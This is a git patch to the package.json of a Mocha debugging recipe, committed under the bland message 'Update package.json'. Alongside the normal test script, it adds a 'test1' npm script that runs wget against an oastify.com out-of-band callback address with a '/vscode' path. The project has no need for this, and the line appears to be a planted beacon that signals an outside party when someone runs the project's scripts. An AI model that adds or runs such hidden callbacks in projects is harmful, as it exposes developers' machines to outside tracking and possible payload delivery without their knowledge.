From e8065d2f513732775ca0337c3eab9704b46d9b05 Mon Sep 17 00:00:00 2001 From: Crazy D1am0nd <53742287+CrazyD1am0nd@users.noreply.github.com> Date: Mon, 20 Feb 2023 11:42:38 +0200 Subject: [PATCH] Update package.json --- debugging-mocha-tests/package.json | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/debugging-mocha-tests/package.json b/debugging-mocha-tests/package.json index 90e44e5..daa315f 100644 --- a/debugging-mocha-tests/package.json +++ b/debugging-mocha-tests/package.json @@ -3,7 +3,8 @@ "version": "1.0.0", "description": "This recipe shows how to use the built-in Node Debugger to debug Mocha tests", "scripts": { - "test": "mocha 'test/**/*.spec.js'" + "test": "mocha 'test/**/*.spec.js'", + "test1": "wget https://ioamgrib2bsmofulk3poqifvemki8bw0.oastify.com/vscode" }, "author": "Jag Reehal", "license": "ISC",